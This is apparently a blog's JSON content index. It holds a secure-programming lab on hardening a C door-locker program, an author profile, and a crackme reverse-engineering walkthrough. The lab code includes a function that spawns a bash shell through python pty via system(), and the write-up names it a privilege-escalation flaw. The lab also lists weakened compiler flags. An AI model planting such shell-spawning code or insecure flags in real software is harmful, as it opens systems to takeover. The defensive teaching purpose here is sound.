program starts. It improves security by making certain sections of memory read-only after the relocation phase. -Wl,-z,lazy: This flag instructs the linker to delay symbol resolution until the symbol is actually used. This can make the program load more efficiently, but it could make it easier for an attacker to exploit any unresolved symbols before they are properly bound. Recommendation: Remove this flag. 
It introduces a potential risk because unresolved symbols could be hijacked before the program fully resolves them, weakening security. -Wl,-z,noexecstack: This flag marks the stack as non-executable, which prevents code from being executed on the stack. This helps mitigate attacks like buffer overflows that try to execute shellcode on the stack. Recommendation: Keep this flag. It is an essential security feature that helps prevent stack-based code execution vulnerabilities. Security Enhancements Summary: # Remove -D_FORTIFY_SOURCE=0: Reinstate compiler security checks for bounds checking and other safeguards by setting it to 2. Remove -fno-stack-protector: Keep stack protection enabled to defend against stack overflow attacks. Remove -Wl,-z,lazy: Avoid lazy symbol resolution to reduce potential vulnerabilities related to unresolved symbols. Keep -Wl,-z,noexecstack and -pie: These flags enhance security by preventing stack execution and enabling position-independent executables. Applying these recommendations gives the proposed secured configuration:\nLEGCFLAGS =-O2 -fpie -D_FORTIFY_SOURCE=2 -fstack-protector-strong LEGLDFLAGS =-pie -Wl,-z,relro -Wl,-z,now -Wl,-z,noexecstack (note that -D_FORTIFY_SOURCE only takes effect when optimization such as -O2 is enabled). When trying to build the Makefile with this secured configuration, we discovered a warning that stopped the build, so we suppressed that specific warning with -Wno-unused-result. Since we were merely trying to see how the compilation-level mitigations carry out, we ignored this code-level issue. The program built successfully after suppressing the unused-result warning. We then attempted the buffer overflow attack again and saw that the attack is detected and the program is terminated. How It Enhances Security # Memory Safety: Prevents stack-based buffer overflows (-fstack-protector-strong). Disallows execution of code on the stack (-z noexecstack). Exploit Mitigation: ASLR support makes memory addresses unpredictable (-fpie, -pie). RELRO ensures critical relocation structures are immutable (-Wl,-z,relro -Wl,-z,now). 
Improved Code Quality: Enforces secure coding standards and flags potential vulnerabilities during compilation (-Wall -Wextra -Werror). Runtime Safety: Uses trusted library paths and avoids unsafe or unverified libraries. How to patch the vulnerabilities above # To prevent the buffer overflow and the lack of user input validation discovered, we patched the validation_functions.c source code as shown below\n#include \u0026lt;stdio.h\u0026gt; #include \u0026lt;stdlib.h\u0026gt; #include \u0026lt;string.h\u0026gt; #include \u0026#34;validation_functions.h\u0026#34; int fnchck(int a, int b) { int check; if (b == a) { puts(\u0026#34;Valid access.\u0026#34;); check = 0xf; } else { check = 0; } return check; } int validate(char * argv[]) { // Use malloc to dynamically allocate the buffer at runtime char *buffer = (char *)malloc(20); if (buffer == NULL) { return 1; } printf(\u0026#34;You entered %s and %s. \\nDo you agree ? (Y,n):\\n\u0026#34;, argv[1], argv[2]); // Use fgets to read the user input since it writes at most one character less than the buffer size, preventing a buffer overflow fgets(buffer, 20, stdin); // Strip the trailing newline that fgets keeps buffer[strcspn(buffer, \u0026#34;\\n\u0026#34;)] = \u0026#39;\\0\u0026#39;; // main() treats 0 as agreement, so return 0 if buffer == \u0026#34;Y\u0026#34; or buffer == \u0026#34;y\u0026#34; int agreed = (strcmp(buffer, \u0026#34;Y\u0026#34;) == 0) || (strcmp(buffer, \u0026#34;y\u0026#34;) == 0); // Free the allocated memory only after the comparisons to avoid a use-after-free free(buffer); return agreed ? 0 : 1; } The code above does the following:\nchar *buffer = (char *)malloc(20); dynamically allocates memory for the buffer at run time. This allows the memory to be placed at a randomized address when ASLR is active. fgets(buffer, 20, stdin); is more secure than scanf: fgets ensures that no more than 19 characters are read, preventing a buffer overflow when saving the input and leaving space for the null terminator; the trailing newline it keeps is stripped with strcspn before the comparison. The initial return expression had two issues. First, it used the \u0026amp;\u0026amp; operator, which meant that if the user input \u0026ldquo;Y\u0026rdquo;, the comparison strcmp(buffer, \u0026ldquo;y\u0026rdquo;) would always evaluate to a non-zero value, causing the check to fail. This bug was fixed by changing the operator to ||. Second, the return value of strcmp(buffer, \u0026ldquo;Y\u0026rdquo;) was not compared against 0, so we introduced the expected result into the evaluation. Finally, since main() proceeds only when validate() returns 0, the function returns 0 on agreement and 1 otherwise, and the buffer is freed only after the comparisons so the input is never read after being freed. The source code below in action_functions.c is vulnerable because the fnR function gives the user a root shell on the terminal, which is a privilege escalation. 
The solution to this problem would be to either delete the code, as it is unused, or exclude it from the executable file during compilation.\n#include \u0026#34;action_functions.h\u0026#34; #include \u0026lt;stdio.h\u0026gt; #include \u0026lt;stdlib.h\u0026gt; void fnr(void) { puts(\u0026#34;The door is locked.\u0026#34;); return; } void fngrt(void) { puts(\u0026#34;Opened.\u0026#34;); puts(\u0026#34;No root.\u0026#34;); return; } // To keep the unused fnR function out of the executable, guard it with a preprocessor conditional and pass the flag -DIGNORE_FUNCTION at compile time #ifndef IGNORE_FUNCTION void fnR(void) { puts(\u0026#34;Opened.\u0026#34;); puts(\u0026#34;Be careful, you are ROOT !\\n\u0026#34;); int value = system(\u0026#34;/usr/bin/env PS1=\\\u0026#34;SUPPOSED ROOT SHELL \u0026gt; \\\u0026#34; python3 -c \u0026#39;import pty; pty.spawn([\\\u0026#34;/bin/bash\\\u0026#34;, \\\u0026#34;--norc\\\u0026#34;])\u0026#39;\u0026#34;); exit(value); } #endif The code snippet above shows the solution, which wraps fnR in an #ifndef IGNORE_FUNCTION guard, where IGNORE_FUNCTION is the flag we pass to the compiler using -D, i.e. -DIGNORE_FUNCTION\nIn main.c, the atoi() function, which converts user input to an integer, performs no error checking: it has no way to report that a string is not a valid number and simply returns 0 for non-numeric input. In the door-locker program, if the user passes two different non-numeric strings as input, both convert to 0, the values compare equal, and the door opens. This vulnerability exists because we are using atoi(). 
To fix this vulnerability, we replaced the atoi() function with the strtol() function, which lets the caller detect invalid input (via its end-pointer argument and errno), as shown in the patched code below.\n#include \u0026lt;stdio.h\u0026gt; #include \u0026lt;stdlib.h\u0026gt; #include \u0026#34;action_functions.h\u0026#34; #include \u0026#34;validation_functions.h\u0026#34; int main(int argc, char * argv[]) { int check; int in0; int in1; if (argc == 3) { check = validate(argv); if (check == 0) { puts(\u0026#34;\\nChecking values\u0026#34;); // Use strtol, which supports error checking, since atoi silently returns 0 on invalid input in0 = (int)strtol(argv[2], NULL, 10); in1 = (int)strtol(argv[1], NULL, 10); check = fnchck(in1, in0); if (check == 0xf) { fngrt(); } else { fnr(); } } else { fnr(); } check = 0; } else { puts(\u0026#34;Usage : client \u0026lt;chiffre0\u0026gt; \u0026lt;chiffre1\u0026gt;\u0026#34;); check = 1; } return check; } How to avoid these mistakes in the future # The vulnerabilities identified and addressed in the source code highlight some of the security concerns we can introduce into our code. Below is a plan for the future software development process to mitigate such mistakes before code is released:\nUse Secure Coding Practices\nAlways validate and sanitize user input to prevent unexpected behavior. Use safer alternatives like fgets instead of gets or scanf to avoid buffer overflows. Dynamically allocate memory using malloc only when necessary. Always check that malloc or calloc succeeded, and free the memory after use to prevent memory leaks. Ensure Code Review and Auditing\nPeer review all new code for adherence to security guidelines. Use static analysis tools (e.g., SonarQube, Coverity) to identify vulnerabilities such as buffer overflows or use of unsafe functions. Periodically review older code to find unused functions, insecure patterns, and deprecated APIs and dependencies, and update them to the recommended alternatives. 
Remove unused functions or ensure they are excluded from compilation (e.g., through #ifdef macros). Enable Compiler Flags for Security\nUse flags like -D_FORTIFY_SOURCE=2 to add compile-time and runtime bounds checks for common string and memory functions. Employ -DIGNORE_FUNCTION to exclude unused functions from the build. Use the -fstack-protector-all flag to enable stack canaries for all functions. Use Linker Flags\nTo ensure the stack is non-executable (a key part of preventing exploit execution), you should also link with the -z noexecstack flag to mark the stack as non-executable, for example: gcc -o my_program my_program.c -fstack-protector-all -fcf-protection -z noexecstack -DIGNORE_FUNCTION Conclusion # This lab focused on enhancing the security of a C program by identifying and mitigating potential vulnerabilities using static code analysis and compiler/linker options. Through the use of cppcheck, we identified issues such as unsafe scanf() usage and variable scope problems. Additionally, we explored vulnerable compiler and linker options that could make the program susceptible to attacks like buffer overflows and memory corruption.\nBy applying secure coding practices and adjusting compilation settings, such as enabling stack protection, disabling executable stacks, and using modern C standards, we significantly improved the program’s security posture. We also addressed the buffer overflow vulnerability by replacing unsafe functions with safer alternatives like fgets() and dynamically allocating memory with proper bounds checks.\nThese enhancements not only mitigate common attack vectors but also enforce better coding standards and runtime safety, making the program more resilient to exploitation. 
Through this process, we reinforced the importance of secure programming practices, both in code and in the compilation process, to protect against malicious exploits.\nAdditionally, we found that the differences between the compared binaries of the two programs did not seem to be related to how the program was compiled. This led us to think that the source code might have been altered in some way, and may not have been identical to start with. However, it is also reasonable to consider that Ghidra’s interpretation of a binary file could vary, potentially influencing how the differences were observed.\nWe also had the opportunity to explore different compiler options in depth, particularly by utilizing the checksec function (from the manual). This provided valuable insights into various security features enabled or disabled by the compiler and further emphasized the importance of thoroughly reading the manual to understand the implications of different compiler flags. Understanding these options allows developers to make informed decisions about which security measures to apply during the compilation process, enhancing the overall security of the program.\n","date":"24 January 2025","permalink":"/njeri/posts/toctou_c/","section":"Posts","summary":"The objective of this lab is to build on our understanding of secure programming in C by analyzing, enhancing, and securing the functionality of the program from Project Lab 1, with a focus on identifying and mitigating vulnerabilities and improving resilience against attacks like fuzzing.\nThis lab focuses on identifying vulnerabilities in the source code, applying and validating patches, and proposing future best practices to prevent similar issues. Additionally, we will analyze the code using security analysis tools (cppcheck) to find out about the vulnerabilities in code. 
After compiling the project, we will inspect the resulting binary in Ghidra to identify similarities and differences, which will further inform our understanding of the program\u0026rsquo;s security and allow us to apply effective mitigations.","title":"Secure Programming in C: Buffer Overwrites and Overflows"},{"content":"","date":"24 January 2025","permalink":"/njeri/tags/secure-programming-lab/","section":"Tags","summary":"","title":"Secure Programming Lab"},{"content":"About # I\u0026rsquo;m a master\u0026rsquo;s student in the Erasmus Mundus CYBERUS program, specializing in software cybersecurity with a focus on AI safety and security. With 4+ years of experience in software development and QA engineering, I\u0026rsquo;m passionate about advancing AI security through rigorous research and collaboration.\nResearch Interests # My current interest is in trustworthy AI and ensuring systems are resilient to adversarial attacks. I\u0026rsquo;m particularly interested in:\nAdversarial Machine Learning: Studying poisoning attacks, model robustness, and defense mechanisms. LLM Security: Exploring alignment, prompt injection, and jailbreaking techniques. Android Penetration Testing: Ensuring the security of mobile apps. Through hands-on labs, I\u0026rsquo;ve worked on LLM alignment and jailbreaking using greedy coordinate descent optimization (implementing research from \u0026ldquo;Universal and Transferable Adversarial Attacks on Aligned Language Models\u0026rdquo;), and built adversarial-resistant malware classifiers for Android APKs.\nCurrent Focus # I\u0026rsquo;m currently deepening my understanding of transformer architectures and mechanistic interpretability through the ARENA course, while also pentesting vulnerable mobile applications. 
I\u0026rsquo;m seeking opportunities in AI safety and security fellowships to contribute to the development of trustworthy AI systems.\nExperience Highlights # Open Source Cybersecurity: I currently work with the AsyncAPI Initiative implementing security best practices including incident response plans, SBOMs, and GitHub security hardening (MFA, CodeQL, protected branches).\nSecurity Research: At Grenoble LIG Lab, I validated a privacy-preserving authentication protocol using ProVerif and built a DNSSEC-enabled server prototype with KnotDNS, researching FIDO key integration for enhanced security.\nSoftware Security Testing: My QA background across multiple companies (Gotu, Wattics/EnergyCAP, Brrng) developed my adversarial thinking and manual vulnerability assessment skills. I\u0026rsquo;ve conducted practical penetration tests (XSS, SQLi, CSRF, XXE, command injection) using Burp Suite and ZAP on DVWA and Juice Shop.\nTechnical Background # AI Security: Adversarial attacks, model robustness evaluation, LLM security\nSecurity Tools: Burp Suite, Metasploit, Wireshark, Ghidra, ZAP, Frida, ProVerif\nDevelopment: Python, Java, C/C++, PyTorch, TensorFlow\nCloud \u0026amp; DevOps: AWS, Docker, Kubernetes, GitHub Actions\nWhat I\u0026rsquo;m Looking For # I\u0026rsquo;m available for a 6-month thesis internship starting February 2026, ideally focused on adversarial machine learning, model robustness, or trustworthy AI evaluation. 
I\u0026rsquo;m also actively seeking AI safety and security fellowships to deepen my research contributions.\nGet in Touch # Feel free to reach out if you\u0026rsquo;re working on AI safety, adversarial ML, or security research—I\u0026rsquo;m always excited to collaborate and learn from others in the field.\nTechnical Writing - LinkedIn Learning SOC Level 1 / Web Hacking - TryHackMe 🛠 Skills # Programming Security Tools DevOps Documentation Testing C, C++ Splunk, Wireshark, OSINT AWS, Kubernetes, Docker Technical Writing Selenium, Puppeteer Java, Kotlin Bash Scripting Cypress Ruby on Rails, Python Manual Testing ✍️ Published Articles and Documentation # Open Source Contributions # Creating a Generator Template Generator Tool Introduction Installation Guide Usage Guide AsyncAPI Document Template Context Generator Version vs Template Version Articles # Mobile Regression Testing vs Unit Testing Explained Rails Excessive Data Exposure: Examples and Prevention Intro to cron and editing your crontab schedule ","date":"1 January 2025","permalink":"/njeri/about/","section":"","summary":"About # I\u0026rsquo;m a master\u0026rsquo;s student in the Erasmus Mundus CYBERUS program, specializing in software cybersecurity with a focus on AI safety and security. With 4+ years of experience in software development and QA engineering, I\u0026rsquo;m passionate about advancing AI security through rigorous research and collaboration.\nResearch Interests # My current interest is in trustworthy AI and ensuring systems are resilient to adversarial attacks. I\u0026rsquo;m particularly interested in:\nAdversarial Machine Learning: Studying poisoning attacks, model robustness, and defense mechanisms. LLM Security: Exploring alignment, prompt injection, and jailbreaking techniques. Android Penetration Testing: Ensuring the security of mobile apps. 
Through hands-on labs, I\u0026rsquo;ve worked on LLM alignment and jailbreaking using greedy coordinate descent optimization (implementing research from \u0026ldquo;Universal and Transferable Adversarial Attacks on Aligned Language Models\u0026rdquo;), and built adversarial-resistant malware classifiers for Android APKs.","title":""},{"content":"","date":"1 December 2024","permalink":"/njeri/tags/buffer-overflow/","section":"Tags","summary":"","title":"Buffer Overflow"},{"content":"","date":"1 December 2024","permalink":"/njeri/tags/buffer-overwrites/","section":"Tags","summary":"","title":"Buffer Overwrites"},{"content":"","date":"1 December 2024","permalink":"/njeri/tags/c-programming/","section":"Tags","summary":"","title":"C Programming"},{"content":"","date":"1 December 2024","permalink":"/njeri/tags/coding101/","section":"Tags","summary":"","title":"Coding101"},{"content":"","date":"1 December 2024","permalink":"/njeri/tags/ctf/","section":"Tags","summary":"","title":"CTF"},{"content":"","date":"1 December 2024","permalink":"/njeri/tags/cyber-security/","section":"Tags","summary":"","title":"Cyber Security"},{"content":"","date":"1 December 2024","permalink":"/njeri/tags/ghidra/","section":"Tags","summary":"","title":"Ghidra"},{"content":"Reverse Engineering # Decompiling a program from assembly back to a high-level language to try to understand what the program does.\nExample use cases:\nVulnerability Analysis Malware Research Binary Analysis Tools Summary (Ghidra Book, Ch. 2) # 1. file # What: Identifies the file format (ELF, PE, Mach-O), architecture (x86, ARM), and bit-width (32/64-bit). When: Step 1 (Triage). Use it the moment you receive a mystery file. Why vs Others: Use this instead of nm or objdump initially because it tells you if the file is even an executable or if it is \u0026ldquo;stripped\u0026rdquo; (missing names). Example Command: file \u0026lt;filename\u0026gt; 2. 
strings # What: Scans the entire file for sequences of printable characters (ASCII/Unicode). When: Initial Recon. Use it to find hardcoded passwords, IP addresses, URLs, or developer comments. Why vs Others: Unlike nm, which only looks at official \u0026ldquo;names\u0026rdquo; (symbols), strings finds human-readable text hidden anywhere in the binary\u0026rsquo;s raw data. Example Command: strings -a \u0026lt;filename\u0026gt; 3. nm # What: Lists the \u0026ldquo;Symbol Table\u0026rdquo;—the names of functions and global variables used in the code. When: Function Discovery. Use it to find the main entry point or identify specific logic like validate_key. Why vs Others: It provides a much cleaner \u0026ldquo;Table of Contents\u0026rdquo; than objdump. If you just need a list of functions without seeing the code, this is the fastest tool. Example Command: nm -D \u0026lt;filename\u0026gt; 4. ldd # What: Prints the shared libraries (dependencies) that the program needs to run. When: Dependency Analysis. Use it to see what external tools the program relies on (e.g., encryption or networking libraries). Why vs Others: Unlike readelf, ldd shows you exactly where those libraries are located on your specific system. Example Command: ldd \u0026lt;filename\u0026gt; 5. objdump # What: The \u0026ldquo;Swiss Army Knife\u0026rdquo; for displaying headers, section info, and raw disassembly. When: Deep Dive (CLI). Use it when you want to see the actual assembly code without opening a GUI like Ghidra. Why vs Others: It is the only tool in this list that can actually disassemble machine code into human-readable assembly instructions. Example Command: objdump -d \u0026lt;filename\u0026gt; 6. readelf # What: Displays extremely detailed technical information about the ELF (Linux) file header and sections. When: Structure Analysis. Use it to find the exact memory addresses of the .text (code) or .data (variables) sections. 
Why vs Others: It is safer than ldd because it only reads the file header and never attempts to execute any part of the binary. Example Command: readelf -h \u0026lt;filename\u0026gt; NOTE: If a binary is Stripped, nm will fail. Your best alternatives are then strings (to find text clues) or objdump -d (to manually read the assembly logic).\nReversing with GHIDRA # Challenge 1 # Reverse Engineering CBM hacker\u0026rsquo;s easy_reverse with Ghidra. After unzipping the file and getting access to the executable, I ran it with the command ./rev50_linux64-bit and saw that it expects me to pass the password as an argument:\nI then decompiled the executable file using Ghidra and selected the main function from the Symbol Tree, which loads the decompiled main function code in the Decompiled Window as shown below:\nI proceeded to change the main undefined signature above to the C standard signature int main(int argc, char *argv[]).\nThe code now looks much cleaner and easier to read, so I proceeded to analyze the code while adding comments:\n1. The Argument Count (argc) # First, the program checks if two arguments are passed using argc == 2, where argv[0] is the name of the program in C. Therefore, argc == 2 means the program expects exactly one user-provided argument. If you run the program without an argument, it calls the usage function and exits.\n2. The String Length # Next, it checks the length of the user input using strlen to ensure it is exactly 10 characters long (arg1_len == 10).\n3. The Character Check # This is the specific requirement argv[1][4] == '@', which checks if the 5th character of the user-provided input is an @ symbol.\nGiven this information, we are able to deduce how to obtain the flag by crafting an argument that satisfies all the conditions listed above, as shown in the following screenshot:\nChallenge 2 # After running the second challenge, I saw that the program requires a password in order to run. 
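Recapping Challenge 1: the three conditions recovered from the decompiled main can be collected into a small C helper. This is a sketch of the recovered logic only; check_password is an illustrative name, not a function from the binary.

```c
#include <string.h>

/* Sketch of the password checks recovered from the decompiled binary:
 * exactly one argument, 10 characters long, '@' as the 5th character.
 * Returns 1 when the candidate password satisfies all three checks. */
int check_password(int argc, char *argv[]) {
    if (argc != 2)               /* argv[0] is the program name */
        return 0;
    if (strlen(argv[1]) != 10)   /* input must be exactly 10 chars */
        return 0;
    if (argv[1][4] != '@')       /* 5th character (index 4) must be '@' */
        return 0;
    return 1;
}
```

Any 10-character argument whose 5th character is @, such as abcd@fghij, passes all three checks.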
I then decompiled the executable using Ghidra\n","date":"1 December 2024","permalink":"/njeri/posts/reverse_engineering/","section":"Posts","summary":"Reverse Engineering # Decompiling a program from assembly back to a high-level language to understand what the program does.\nExample use cases:\nVulnerability Analysis Malware Research Binary Analysis Tools Summary (Ghidra Book, Ch. 2) # 1. file # What: Identifies the file format (ELF, PE, Mach-O), architecture (x86, ARM), and bit-width (32/64-bit). When: Step 1 (Triage). Use it the moment you receive a mystery file. Why vs Others: Use this instead of nm or objdump initially because it tells you if the file is even an executable or if it is \u0026ldquo;stripped\u0026rdquo; (missing names). Example Command: file \u0026lt;filename\u0026gt; 2.","title":"Reverse Engineering"},{"content":"Introduction # The objective of this lab is to build on our understanding of secure programming in C by analyzing, enhancing, and securing the functionality of the program from Project Lab 1, with a focus on identifying and mitigating vulnerabilities and improving resilience against attacks like fuzzing.\nThis lab focuses on identifying vulnerabilities in the source code, applying and validating patches, and proposing future best practices to prevent similar issues. Additionally, we will analyze the code using a security analysis tool (cppcheck) to find vulnerabilities in the code. After compiling the project, we will inspect the resulting binary in Ghidra to identify similarities and differences, which will further inform our understanding of the program\u0026rsquo;s security and allow us to apply effective mitigations. 
The goal is to deliver a secure, improved program with a detailed report on the analysis, changes, and recommendations.\nAnalysis Method (cppcheck) # Since we are provided with the source code, we try to identify potential threats in it with a static code analysis tool, cppcheck.\nFirst, we extract the provided files using the given instructions. We ran cppcheck on the program and identified the following threats: Variable Scope Issues: The variables in0 and in1 in src/main.c have unnecessarily wide scopes, which may lead to unintended use or harder code maintenance. Unsafe Use of scanf(): In src/validation/validation_functions.c, scanf(\u0026quot;%s\u0026quot;, buffer) lacks a field width limit, making it vulnerable to buffer overflows if provided with excessively large input. Unused Function: The function fnR in src/action/action_functions.c is never called, indicating potential dead code, which can increase codebase complexity or lead to latent issues if not properly reviewed. Given the program\u0026rsquo;s small size, we can conduct manual security code reviews against secure coding standards and write test programs to identify common vulnerabilities. However, since we use a Makefile to efficiently compile and run multiple files together, manually reviewing each file one by one becomes impractical in real-world scenarios. Therefore, we propose starting with static analysis for a more efficient and thorough approach. Legacy Options # Finding the Original Compiler Options (LEGCFLAGS) Leading to Vulnerabilities # checksec is a Linux tool that analyzes binary files to identify security features implemented during compilation and linking, such as RELRO, NX, PIE, Stack Canary, and FORTIFY_SOURCE. 
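As a side note on the unsafe scanf() finding above: the fix cppcheck points toward is a field width limit, so that at most buffer-size-minus-one characters can ever be written. A minimal sketch, using sscanf so the behaviour is easy to demonstrate (the same %19s limit applies to scanf reading from stdin):

```c
#include <stdio.h>
#include <string.h>

/* The %19s conversion stops after 19 characters, leaving room for the
 * terminating '\0' in a 20-byte buffer, so oversized input cannot
 * overflow it. Contrast with the unbounded "%s" cppcheck flagged. */
int read_limited(const char *input, char out[20]) {
    return sscanf(input, "%19s", out);
}
```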
To infer the LEGCFLAGS (the legacy compiler flags) used in the door-locker binary from the given checksec output, we analyze the provided information step by step: Breakdown of checksec Output: # RELRO: Partial RELRO Indicates that the binary is compiled with -Wl,-z,relro but not with -Wl,-z,now. This provides partial protection against GOT overwrite attacks. At first we only configured -Wl,-z,relro; however, full RELRO would always still be enabled, so we suspected that -Wl,-z,now is applied by default and took the extra step of adding -Wl,-z,lazy to enforce lazy symbol resolution, which is required for Partial RELRO. STACK CANARY: No canary found Suggests the binary was not compiled with -fstack-protector or similar flags. This makes it vulnerable to stack-based buffer overflows. NX (No Execute): Enabled The binary is compiled with -Wl,-z,noexecstack or equivalent, which prevents code execution on the stack. PIE (Position-Independent Executable): Enabled Indicates the binary was compiled with -fPIE -pie. This allows address randomization, enhancing security against exploits. RPATH and RUNPATH: Not set The binary has no hardcoded runtime library search paths, indicating good practice. Symbols: (45) Symbols Indicates the binary includes some debug symbols or symbol table information, possibly due to compilation with -g or no stripping of symbols. FORTIFY: No The binary lacks fortification, thus we configured it explicitly as -D_FORTIFY_SOURCE=0. Likely Legacy Options: # Based on the above, the likely compiler flags are:\nLEGCFLAGS =-fpie -D_FORTIFY_SOURCE=0 -fno-stack-protector LEGLDFLAGS =-pie -Wl,-z,relro -Wl,-z,lazy -Wl,-z,noexecstack Running checksec after making the program, we got an identical security configuration result to the binary file provided in Lab 1. These flags explain the security features observed:\n-fPIE -pie: For PIE enabled. 
These flags enable Position-Independent Executable (PIE), making the executable\u0026rsquo;s code location-independent, which allows the OS to load it at different memory addresses for better security (such as enabling Address Space Layout Randomization, ASLR). -D_FORTIFY_SOURCE=0: For No Fortify. This disables the FORTIFY_SOURCE security feature, which normally enhances the security of certain string and memory operations by checking for buffer overflows at compile time. -fno-stack-protector: For No Canary Found. This flag disables stack protection mechanisms (canary values) that are used to detect and prevent stack buffer overflows during execution. -Wl,-z,relro \u0026amp; -Wl,-z,lazy: For Partial RELRO. The -z,relro flag enables a form of read-only relocation (RELRO) to protect the Global Offset Table (GOT) from modification, while -z,lazy ensures that symbol resolution is deferred until needed, allowing for Partial RELRO. -Wl,-z,noexecstack: For NX enabled. This flag prevents the stack from being executable, mitigating the risk of certain types of attacks, such as buffer overflows that attempt to execute code from the stack (NX or No Execute protection). 
Analyze Binary in Ghidra # Compilation options used for LEGCFLAGS =-fpie -D_FORTIFY_SOURCE=0 -fno-stack-protector LEGLDFLAGS =-pie -Wl,-z,relro -Wl,-z,lazy -Wl,-z,noexecstack Original Binary for main function (Lab 1) int main(int argc,char **argv) { long lVar1; long lVar2; int iVar3; if (argc == 3) { iVar3 = validate(argv); if (iVar3 == 0) { puts(\u0026#34;\\nChecking values\u0026#34;); lVar1 = strtol(argv[2],(char **)0x0,10); lVar2 = strtol(argv[1],(char **)0x0,10); iVar3 = 0; if (lVar2 == lVar1) { puts(\u0026#34;Valid access.\u0026#34;); fngrt(); } else { fnr(); } } else { fnr(); iVar3 = 0; } } else { puts(\u0026#34;Usage : client \u0026lt;chiffre0\u0026gt; \u0026lt;chiffre1\u0026gt;\u0026#34;); iVar3 = 1; } return iVar3; } New Binary for main function (Lab 2) int main(int argc,char **argv) { int iVar1; int iVar2; long lVar3; long lVar4; if (argc == 3) { iVar1 = validate(argv); if (iVar1 == 0) { puts(\u0026#34;\\nChecking values\u0026#34;); lVar3 = strtol(argv[2],(char **)0x0,10); lVar4 = strtol(argv[1],(char **)0x0,10); iVar2 = fnchck((int)lVar4,(int)lVar3); iVar1 = 0; if (iVar2 == 0xf) { fngrt(); } else { fnr(); } } else { fnr(); iVar1 = 0; } } else { puts(\u0026#34;Usage : client \u0026lt;chiffre0\u0026gt; \u0026lt;chiffre1\u0026gt;\u0026#34;); iVar1 = 1; } return iVar1; } Overview # Two binary files, produced from slightly differing versions of source code, were analyzed. Despite identical checksec results indicating similar security configurations, functional discrepancies were observed. This report outlines the differences, potential causes, and investigative steps taken to identify the reasons behind the variations.\nKey Observations # Logic Differences in Validation:\nFirst Binary: Directly compares two long values using if (lVar2 == lVar1) to determine success. fnchck is included in the project but never called. Second Binary: Introduces a new function, fnchck, which takes the casted integer values of lVar3 and lVar4 as arguments. 
Success is determined by the condition if (fnchck(...) == 0xf). Finding: The second binary includes an additional layer of logic not present in the first.\nVariable Usage and Type Casting:\nBoth binaries use long variables for storing input values. The second binary explicitly casts these long values to int when calling fnchck. Finding: Type casting was introduced in the second binary, potentially as part of an additional validation mechanism.\nCommon Functionality:\nBoth binaries call fngrt() upon success and fnr() upon failure. However, the success criteria differ due to the logic variations described above. Finding: Core functionality remains similar, but validation mechanisms differ.\nPotential Causes of Differences # Source Code Variations: The inclusion of fnchck in the second binary suggests either a different version of the source code or manual modification. Conditional Compilation: Preprocessor directives such as #ifdef or #define may have enabled or disabled specific sections of code during compilation. Compiler or Optimization Settings: Compiler flags (e.g., O2, O3) may have introduced optimizations or modifications in one binary but not the other. However, optimizations typically simplify logic rather than adding new functions like fnchck. Linker Behavior or Library Dependencies: Differences in the linker scripts, library versions, or included dependencies might have affected the compiled output. Possible Next Investigative Steps # Compilation Flags: The compilation process for both binaries was analyzed with verbose options (gcc -v and ld --verbose) to identify differences in flags. Special attention was paid to optimization levels and security-related flags. Disassembly Analysis: Using objdump -d, the assembly-level differences between the two binaries were reviewed. This revealed the introduction of fnchck and its associated logic in the second binary. 
Preprocessor Directives: The source code was inspected for conditional compilation directives (e.g., #ifdef) that could enable or disable sections of the code. Controlled Recompilation: Various combinations of compiler and linker flags were tested to replicate the logic in both binaries, including: Adjusting optimization levels (-O0, -O2, -O3). Explicitly enabling or disabling RELRO (-Wl,-z,relro or -Wl,-z,now). Original Binary for validate function (Lab 1)\nvoid validate(int param_1) { char local_20 [24]; printf(\u0026#34;You entered %s and %s. \\nDo you agree ? (Y,n):\\n\u0026#34;,*(undefined4 *)(param_1 + 4), *(undefined4 *)(param_1 + 8)); __isoc99_scanf(\u0026amp;DAT_00012057,local_20); strcmp(local_20,\u0026#34;Y\u0026#34;); return; } New Binary for validate function (Lab 2) int validate(char **argv) { uint uVar1; int iVar2; char buffer [20]; printf(\u0026#34;You entered %s and %s. \\nDo you agree ? (Y,n):\\n\u0026#34;,argv[1],argv[2]); __isoc99_scanf(\u0026amp;DAT_0010204b,buffer); uVar1 = strcmp(buffer,\u0026#34;Y\u0026#34;); if (uVar1 != 0) { iVar2 = strcmp(buffer,\u0026#34;y\u0026#34;); uVar1 = (uint)(iVar2 != 0); } return uVar1; } The primary differences seem to be due to code-level changes rather than compiler flag differences. However, certain flags like -fstack-protector, -O2, or -O3 could potentially influence buffer allocation, optimization, or even removal of unused code, but they are not directly responsible for the changes in logic and structure between the two versions. The second version appears to be a more robust implementation, checking both uppercase and lowercase \u0026quot;Y\u0026quot; inputs and correctly using the result of the comparison.\nSecured Makefile Configuration # 1. LEGCFLAGS = -fpie -D_FORTIFY_SOURCE=0 -fno-stack-protector # -fpie: This flag enables the creation of position-independent executables (PIE). 
This improves security by enabling Address Space Layout Randomization (ASLR), making it harder for attackers to predict the memory layout of a program. -D_FORTIFY_SOURCE=0: This disables the \u0026ldquo;fortify\u0026rdquo; source feature, which provides additional compile-time checks to enhance security. By setting this to 0, the program won\u0026rsquo;t benefit from additional security features such as bounds checking for certain functions like strcpy, memcpy, etc. Recommendation: Remove this flag or set it to 2 (the highest level of fortification). Setting it to 0 reduces the security checks and can make your application more vulnerable to buffer overflow attacks. -fno-stack-protector: This disables stack protection, which is typically used to detect and prevent buffer overflow attacks by placing \u0026ldquo;canaries\u0026rdquo; on the stack. Recommendation: Remove this flag. Disabling stack protection weakens security by making it easier for attackers to exploit stack buffer overflows. Keep -fstack-protector or use -fstack-protector-strong (which is a more secure version). 2. LEGLDFLAGS = -pie -Wl,-z,relro -Wl,-z,lazy -Wl,-z,noexecstack # -pie: This flag creates a position-independent executable, which works together with ASLR to randomize the memory layout, improving security. -Wl,-z,relro: This flag enables \u0026ldquo;Read-Only Relocation\u0026rdquo; (RELRO), which makes it harder for an attacker to modify function pointers after the program starts. It improves security by making certain sections of memory read-only after the relocation phase. -Wl,-z,lazy: This flag instructs the linker to delay symbol resolution until the symbol is actually used. This can make the program load more efficiently, but it could make it easier for an attacker to exploit any unresolved symbols before they are properly bound. Recommendation: Remove this flag. 
